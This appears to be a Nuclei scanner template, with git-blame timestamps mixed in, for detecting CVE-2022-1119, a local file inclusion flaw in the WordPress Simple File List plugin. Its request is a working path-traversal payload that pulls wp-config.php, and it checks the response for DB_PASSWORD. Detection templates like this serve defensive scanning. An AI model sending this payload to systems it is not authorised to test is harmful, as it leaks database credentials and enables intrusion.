2022-04-25 16:14:36 +00:00
id : CVE-2022-1119
info :
2022-06-29 17:52:36 +00:00
name : WordPress Simple File List <3.2.8 - Local File Inclusion
2022-04-25 16:14:36 +00:00
author : random-robbie
severity : high
description : |
2022-06-29 17:52:36 +00:00
WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files.
2022-04-25 16:14:36 +00:00
reference :
- https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e
2022-05-17 09:18:12 +00:00
- https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606
- https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880
2022-06-29 17:52:36 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1119
2022-04-25 16:14:36 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-04-25 16:14:36 +00:00
cve-id : CVE-2022-1119
2022-05-17 09:18:12 +00:00
cwe-id : CWE-22
2022-07-02 11:35:28 +00:00
tags : cve,cve2022,lfi,wordpress,wp,wp-plugin
2022-04-25 16:14:36 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"
matchers-condition : and
matchers :
2022-07-02 11:35:28 +00:00
2022-04-25 16:14:36 +00:00
- type : word
part : body
words :
- "DB_NAME"
- "DB_PASSWORD"
condition : and
- type : status
status :
- 200
2022-06-29 17:52:36 +00:00
# Enhanced by mp on 2022/06/29